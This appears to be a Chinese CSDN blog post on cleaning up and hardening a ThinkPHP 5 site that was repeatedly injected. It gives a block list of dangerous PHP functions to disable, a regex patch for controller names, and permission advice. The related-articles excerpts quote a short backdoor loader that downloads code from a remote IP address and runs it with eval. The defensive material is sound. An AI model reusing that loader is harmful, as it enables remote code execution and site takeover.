解决TP5项目被恶意篡改、注入代码问题

最新推荐文章于 2022-12-07 11:36:34 发布
最新推荐文章于 2022-12-07 11:36:34 发布
阅读量3.2k 收藏 4
点赞数
分类专栏: # php安全 文章标签: 安全
原文链接:https://blog.csdn.net/qq_39188306/article/details/94559281
版权

解决TP5项目被恶意篡改、注入代码问题


首先,谈谈这个曲折的经历!

       第一次,被人用eval()函数注入了文件,发现后,我就禁了这些PHP高危险函数!

       第二次,就是被人在入口文件中注入了代码,在public文件夹中,多出了很多文件。然后我就修改了宝塔面板的密码,加上下面的第2步,目前暂时没有被注入了,希望能帮到大家!

       如果还有更好的办法,希望不吝赐教,留下你宝贵的经验,万分感谢!

1、禁掉高危险函数:eval、phpinfo 这2个函数必须禁掉!

(1)、需禁用的函数名,如下: 
phpinfo、eval、passthru、exec、system、chroot、scandir、chgrp、chown、shell_exec、proc_open、proc_get_status、ini_alter、ini_restore、dl、pfsockopen、openlog、syslog、readlink、symlink、popepassthru、stream_socket_server、fsocket、fsockopen、putenv、create_function

(2)、下面两个可以根据项目中是否用到来决定是否禁用,如下:

error_log、ini_set

(3)、建议可禁用的函数,如下:

pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wi

2、找到 项目根目录/thinkphp/library/think/App.php文件,在373行添加如下代码,用正则去匹配

if (!preg_match('/^[A-Za-z][\w\.]*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}


附上截图:

3、最好是public文件夹的文件都给上权限,不然人家想改就改!

4、服务器中的网站配置,默认文件,如非必要,只保留index.php

此致,应该不会出问题了,我现在还在探索有没有更好的解决办法!
 

sunsineq
关注
专栏目录
thinkphp 5.0 index.php被替换成首页内容,被注入恶意代码
weixin_34019929的博客
03-11 3475
原TP项目是5.0.10,近日,在登录后台时,域名/admin,跳转到网站首页。无法进入后台登录页面。然后发现,public/index.php竟然被改了。 先升级到5.0.24。还是被中枪。 后来领导查看了nginx日志。日志在 /home/wwwlogs/域名.log 发现了某个上传图片的目录下,竟然有.php文件。 192.168.100.1 - - [06/Mar/2019:14:16:...
宝塔TP5项目篡改
最新发布
qq_37170740的博客
03-17 662
找到插件及对应网站开启防篡改后,会在项目.git文件夹创建2个.lock文件;
tp5 webshell漏洞,文件被篡改,fastadmin老版本的存在此问题解决方法
qq_41409720的博客
08-30 3046
1.首先是把攻击文件清理。 找攻击文件的方式有在静态文件目录查找后缀为 “.php”的文件就好了 2.修改tp5底层的一个漏洞: 修改第一个文件 yourpath\thinkphp\library\think\App.php 搜索 public static function module( 找到 ==》 // 获取控制器名 $controller = stri...
tp5恶意篡改项目被增加位置文件?
irose的博客
07-07 1242
1.最重要的是把当前项目删掉,使用备份(因为你不知道它在你的哪个文件夹插入木马文件,最直接就是删掉) 2.然后开始做一下操作 3.可以更新框架版本 4.禁掉高危险函数:eval、phpinfo 这2个函数必须禁掉! (1)、需禁用的函数名,如下: phpinfo、eval、passthru、exec、system、chroot、scandir、chgrp、chown、shell_exec、proc_open、proc_get_status、ini_alter、ini_restore、dl、pfsockope
tp5.1 token解决接口数据被篡改安全问题
xiaoyong1110的专栏
10-30 1146
tp5.1防止接口数据被篡改解释一下上面代码: 一般使用场景:用户登录,要防止登录数据被篡改代码如下: /** * 验证token,防止数据被篡改 * @param $arr [全部请求参数] */ public function check_token($arr){ if (!isset($arr['token']) || empty($arr['token'])){ $this->info_msg('400'
TP5 修改代码
Yan 小铁匠
08-21 499
修改HTML代码: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Wanna tell her - interactive DHTML</title> <m...
公司项目tp5导入注意事项
编程技术提升
01-26 261
以前tp3.2,可以直接扔进目录即可,现在域名指向要指向public文件夹,而且apache服务器的重写规则要开启,而且用nginx+php7.0还没有成功,切换到apache+php5.6就能正常运行了
tp5 修改
chen782079048的博客
04-15 2715
tp5 修改
第53天:代码审计-TP5框架及无框架变量覆盖反序列化1
08-03
函数如`include`, `include_once`, `require`, `require_once`等可能导致恶意文件被包含,攻击者可以覆盖合法文件,执行恶意代码。应避免使用动态变量作为文件路径,或者对包含的文件路径进行严格的验证和过滤。 5...
tp5修改
L_jf_的博客
08-02 280
tp5修改 js部分 php部分 由于比较懒,这里是先删除再进行添加,其实可以写两个php方法,第一个用来返回数据库数据,第二个用来修改数据库,这样就不会造成一些不必要的麻烦 ...
保护index.php不被更改,thinkphp 5.0 index.php被替换成首页内容,被注入恶意代码
weixin_35441226的博客
03-10 1097
先升级到5.0.24。还是被中枪。后来领导查看了nginx日志。日志在 /home/wwwlogs/域名.log发现了某个上传图片的目录下,竟然有.php文件。192.168.100.1 - - [06/Mar/2019:14:16:35 +0800] "POST /uploads/image/chinaword/2017/06/a60a38662b5ddcd5cfdf365ca97af24c.p...
关于TP5多语言BUG的解决办法(直接上代码)
Gino_tkzzz的博客
06-22 3449
按照手册配置,默认语言没有反应,跳转页面之后,也没有检测当前的语言,很尴尬!!! //最大的bug在这里 1.请用下面代码覆盖 thinkPhp/library/think/Lang.php 里面的detect()自动检测语言方法   /** * 自动侦测设置获取语言选择 * @access public * @return string */ ...
tp5在IIS(winServer2012)服务器环境中隐藏index.php文件并解决put,delete方法405报错
jiangxudong1085的博客
06-29 2303
下载并安装重写模块,地址:https://www.iis.net/downloads/microsoft/url-rewrite#additionalDownloads 2.随便设置一个规则,就会在你给该网站配置的物理路径下新建一个web.config文件 3.将下列文件中的内容替换掉web.config文件中的&lt;rewrite&gt;&lt;/rewrite&gt;标签内容 ...
php主页劫持,基于 ThinkPHP5 的 cltphp 被搜索劫持,篡改首页的解决过程记录
weixin_34406909的博客
03-09 949
经过对比文件:1- 攻击者会写入与原文件名类似的文件, ,内容:function s(){$contents = file_get_contents('http://67.198.186.42:29808/s/admine21.txt');a($contents);}function a($conn){$b = '';eval($b.$conn.$b);}s();?>或者$b = '';wh...
网站被篡改是被攻击了嘛?该怎么解决呢?
weixin_67757219的博客
12-07 554
近期,遇见了很多的网站客户反映说受到了DDoS攻击和CC攻击,IT行业的人都了解有些公司网站、个人站等是没有专门的安全技术人员去维护,导致网站经常会被攻击,进不去,或者利用漏洞篡改网站首页,跳转到不正规网站等。这有是属于哪一种类型攻击呢?那出现这种情况又该如何解决呢?1:网站被黑客攻击,说明你的网站存在很多安全隐患,以及网站漏洞,就算登录服务器找到源文件修复了,也会被黑客再次入侵,只有把网站的所有漏洞找出来,一一进行修复,防止黑客的攻击,避免安全事故发生,如果您对网站漏洞修复不熟悉的话,建议找专业的网站安全
项目入口文件index.php篡改后果,为什么我把入口文件index.php移到public外面,再修改入口文件如下,但是无法显示页面...
weixin_36336411的博客
03-11 707
// +----------------------------------------------------------------------// | ThinkPHP [ WE CAN DO IT JUST THINK ]// +----------------------------------------------------------------------// | Copyri...
index.php被修改,php中设置index.php文件为只读的方法
weixin_31290873的博客
03-09 723
index.php文件设置只读属性后,木马就没权限给你文件末尾追加广告了。下面我们看具体的代码,设置index.php只读:function set_writeable($file_name){if(@chmod($file_name,0555)){echo "修改index.php文件只读属性成功";}else{echo "修改index.php文件只读属性失败,空间商不支持此操作!";}}s...
thinkphp5去除index.php的几大方式,根治各种不行
热门推荐
10年老码农
06-12 1万+
tp5中官方给出的去隐藏index.php方法如下:[ Apache ]httpd.conf配置文件中加载了mod_rewrite.so模块AllowOverride None 将None改为 All把下面的内容保存为.htaccess文件放到应用入口文件的同级目录下&lt;IfModule mod_rewrite.c&gt; Options +FollowSymlinks -Multivi...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值